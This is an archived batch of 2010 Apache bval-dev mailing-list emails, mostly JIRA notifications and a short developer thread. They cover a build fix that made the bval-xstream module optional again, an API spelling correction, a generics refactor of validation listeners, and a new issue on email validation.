https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886824#action_12886824 ] Matt Benson commented on BVAL-77: --------------------------------- Shall I prepare a patch for this? > bval-guice needs the optional bval-xstream module > ------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:01:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79984 invoked from network); 9 Jul 2010 19:01:19 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:01:19 -0000 Received: (qmail 80812 invoked by uid 500); 9 Jul 2010 19:01:19 -0000 Delivered-To: [email protected] Received: (qmail 80779 invoked by uid 500); 9 Jul 2010 19:01:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80770 invoked by uid 99); 9 Jul 2010 19:01:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:01:18 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:01:16 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69J0sUi007359 for <[email protected]>; Fri, 9 Jul 2010 19:00:54 GMT Message-ID: <22977644.290631278702054269.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:00:54 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-77) Recent changes made the bval-xstream module required, instead of optional In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods updated BVAL-77: ----------------------------- Summary: Recent changes made the bval-xstream module required, instead of optional (was: bval-guice needs the optional bval-xstream module) > Recent changes made the bval-xstream module required, instead of optional > ------------------------------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:03:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80388 invoked from network); 9 Jul 2010 19:03:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:03:15 -0000 Received: (qmail 83089 invoked by uid 500); 9 Jul 2010 19:03:15 -0000 Delivered-To: [email protected] Received: (qmail 83050 invoked by uid 500); 9 Jul 2010 19:03:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83042 invoked by uid 99); 9 Jul 2010 19:03:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:03:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:03:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69J2oKQ007389 for <[email protected]>; Fri, 9 Jul 2010 19:02:50 GMT Message-ID: <26634616.290731278702170301.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:02:50 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-77) Recent changes made the bval-xstream module required, instead of optional In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-77: ---------------------------- Attachment: BVAL-77-javadoc.patch.txt Additional patch to get XMLMetaBeanManager out of the javadoc links as well. > Recent changes made the bval-xstream module required, instead of optional > ------------------------------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > Attachments: BVAL-77-javadoc.patch.txt > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:03:33 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80470 invoked from network); 9 Jul 2010 19:03:32 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:03:32 -0000 Received: (qmail 83187 invoked by uid 500); 9 Jul 2010 19:03:32 -0000 Delivered-To: [email protected] Received: (qmail 83141 invoked by uid 500); 9 Jul 2010 19:03:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83133 invoked by uid 99); 9 Jul 2010 19:03:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:03:32 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp106.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 09 Jul 2010 19:03:24 +0000 Received: (qmail 48167 invoked from network); 9 Jul 2010 19:01:32 -0000 Received: from drwoods.local ([email protected] with plain) by smtp106.prem.mail.ac4.yahoo.com with SMTP; 09 Jul 2010 12:01:32 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: 0sSlyB0VM1lwgH1WyjTN77u.NZltw99mGLZ7td0EPSk9RmL mnFeoogeYQFVL.G1zZX.DCiwI8GYmjeFSiGr84OIKLbazWzBwlIn6K0_LmX2 KEY6Uc94WVDEeWE.NIh1PFdqttxRoudOmeSWHdvTnpGzf7xPE6kpcCS7u0KJ mzCfVjwbUyZcXRcNVLNv1eSv2yAjApBzghmlh.T.Pntg_7.B1hOnSa9bkPwg NjfJWeS_aH58uvcx0Vnepbtby18x1Sx20PSjzhdMPjIQmWJdD2b5marbjpyt S7VRSX66h7evKTNTOku9EaZ6.Pw-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Fri, 09 Jul 2010 15:01:32 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org No prob. I would've missed that too, given the classes were in the imports, but marked as provided in the pom.xml. -Donald On 7/9/10 2:49 PM, Matt Benson wrote: > > On Jul 9, 2010, at 1:45 PM, Donald Woods wrote: > >> I just did a "mvn clean install" from the project root and hit the >> problem. Seems that there were changes in return types in - >> bval-jsr303/src/main/java/org/apache/bval/jsr303/ApacheFactoryContext.java >> that is now causing the bval-xstream to be required, instead of >> optional. I redo the changes in BVAL-77 to fix this. >> > > I just saw that I had caused that. Sorry about that. :/ -Matt > >> >> -Donald >> >> >> On 7/9/10 2:31 PM, Matt Benson wrote: >>> >>> On Jul 9, 2010, at 1:26 PM, Donald Woods wrote: >>> >>>> Well, these look like valid failuresin bval-guice due to recent changes >>>> (I can recreate on my Mac with 1.6.0_20)... All 4 failures have the >>>> same cause - >>>> >>> >>> Weird, because I'm running 'mvn test' from bval/ and get full success. What command line are you using to recreate the problem? When I went out to Hudson I saw those "error parsing repository.xml" errors that you had reported to the builds list last month, so assumed that was the reason the dependency class wasn't found. >>> >>> Regards, >>> Matt >>> >>>> Error injecting constructor, java.lang.NoClassDefFoundError: >>>> org/apache/bval/xml/XMLMetaBeanManager >>>> at >>>> org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) >>>> while locating org.apache.bval.guice.ValidatorProvider >>>> while locating javax.validation.Validator >>>> for field at >>>> org.apache.bval.guice.ValidateMethodInterceptor.validator(ValidateMethodInterceptor.java:53) >>>> at >>>> org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) >>>> >>>> >>>> On 7/9/10 1:47 PM, Matt Benson wrote: >>>>> I see this has happened before; anyone know what fixes it? :| >>>>> >>>>> -Matt >>>>> >>>>> On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: >>>>> >>>>>> See <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/changes> >>>>>> >>>>>> >>>>> >>>>> >>> >>> > > From [email protected] Fri Jul 09 19:05:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84804 invoked from network); 9 Jul 2010 19:05:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:05:15 -0000 Received: (qmail 86772 invoked by uid 500); 9 Jul 2010 19:05:15 -0000 Delivered-To: [email protected] Received: (qmail 86724 invoked by uid 500); 9 Jul 2010 19:05:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86716 invoked by uid 99); 9 Jul 2010 19:05:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:05:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:05:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69J4o2k007418 for <[email protected]>; Fri, 9 Jul 2010 19:04:51 GMT Message-ID: <23885764.290791278702290869.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:04:50 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-76) Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() In-Reply-To: <11200891.286291278694857368.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-76?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods resolved BVAL-76. ------------------------------ Fix Version/s: 0.2-incubating Resolution: Fixed Committed revision 962637. > Correct spelling error in API: ConstraintValidationListener.getConstaintViolations() > ------------------------------------------------------------------------------------- > > Key: BVAL-76 > URL: https://issues.apache.org/jira/browse/BVAL-76 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Assignee: Donald Woods > Fix For: 0.2-incubating > > Attachments: BVAL-76.patch.txt > > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:08:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85834 invoked from network); 9 Jul 2010 19:08:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:08:48 -0000 Received: (qmail 88880 invoked by uid 500); 9 Jul 2010 19:08:48 -0000 Delivered-To: [email protected] Received: (qmail 88847 invoked by uid 500); 9 Jul 2010 19:08:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88839 invoked by uid 99); 9 Jul 2010 19:08:48 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:08:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:08:45 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69J0sbp007365 for <[email protected]>; Fri, 9 Jul 2010 19:00:54 GMT Message-ID: <21039489.290651278702054860.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:00:54 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-77) Recent changes made the bval-xstream module required, instead of optional In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods resolved BVAL-77. ------------------------------ Resolution: Fixed Committed revision 962634. > Recent changes made the bval-xstream module required, instead of optional > ------------------------------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:11:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86226 invoked from network); 9 Jul 2010 19:11:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:11:14 -0000 Received: (qmail 90584 invoked by uid 500); 9 Jul 2010 19:11:14 -0000 Delivered-To: [email protected] Received: (qmail 90557 invoked by uid 500); 9 Jul 2010 19:11:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90549 invoked by uid 99); 9 Jul 2010 19:11:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:11:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:11:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69JAnZY007476 for <[email protected]>; Fri, 9 Jul 2010 19:10:50 GMT Message-ID: <5258107.290951278702649644.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:10:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints In-Reply-To: <10904718.289781278701091136.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-78: ---------------------------- Attachment: BVAL-78.patch.txt Update patch since BVAL-76 was accepted. > Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints > ------------------------------------------------------------------------------------------------------ > > Key: BVAL-78 > URL: https://issues.apache.org/jira/browse/BVAL-78 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: BVAL-78.patch.txt > > > Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: > * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. > * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. > * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:11:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86273 invoked from network); 9 Jul 2010 19:11:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:11:14 -0000 Received: (qmail 90676 invoked by uid 500); 9 Jul 2010 19:11:14 -0000 Delivered-To: [email protected] Received: (qmail 90636 invoked by uid 500); 9 Jul 2010 19:11:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90628 invoked by uid 99); 9 Jul 2010 19:11:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:11:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:11:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69JAoud007488 for <[email protected]>; Fri, 9 Jul 2010 19:10:50 GMT Message-ID: <21750405.290991278702650572.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:10:50 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints In-Reply-To: <10904718.289781278701091136.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-78: ---------------------------- Attachment: (was: BVAL-78.patch.txt) > Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints > ------------------------------------------------------------------------------------------------------ > > Key: BVAL-78 > URL: https://issues.apache.org/jira/browse/BVAL-78 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: BVAL-78.patch.txt > > > Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: > * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. > * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. > * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:16:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87437 invoked from network); 9 Jul 2010 19:16:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:16:45 -0000 Received: (qmail 98134 invoked by uid 500); 9 Jul 2010 19:16:45 -0000 Delivered-To: [email protected] Received: (qmail 98095 invoked by uid 500); 9 Jul 2010 19:16:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98087 invoked by uid 99); 9 Jul 2010 19:16:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:16:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:16:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69J8ppS007454 for <[email protected]>; Fri, 9 Jul 2010 19:08:51 GMT Message-ID: <8939422.290901278702531447.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:08:51 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-77) Recent changes made the bval-xstream module required, instead of optional In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886837#action_12886837 ] Donald Woods commented on BVAL-77: ---------------------------------- Applied javadoc fix as r962639. Matt, thanks for the patch. > Recent changes made the bval-xstream module required, instead of optional > ------------------------------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > Attachments: BVAL-77-javadoc.patch.txt > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 19:44:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92456 invoked from network); 9 Jul 2010 19:44:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 19:44:44 -0000 Received: (qmail 28824 invoked by uid 500); 9 Jul 2010 19:44:44 -0000 Delivered-To: [email protected] Received: (qmail 28776 invoked by uid 500); 9 Jul 2010 19:44:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28763 invoked by uid 99); 9 Jul 2010 19:44:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:44:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 19:44:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69Jank3007732 for <[email protected]>; Fri, 9 Jul 2010 19:36:50 GMT Message-ID: <16562991.291571278704209592.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 15:36:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-79) email validation can easily work for any CharSequence rather than String only MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org email validation can easily work for any CharSequence rather than String only ----------------------------------------------------------------------------- Key: BVAL-79 URL: https://issues.apache.org/jira/browse/BVAL-79 Project: BeanValidation Issue Type: Improvement Components: jsr303 Affects Versions: 0.2-incubating 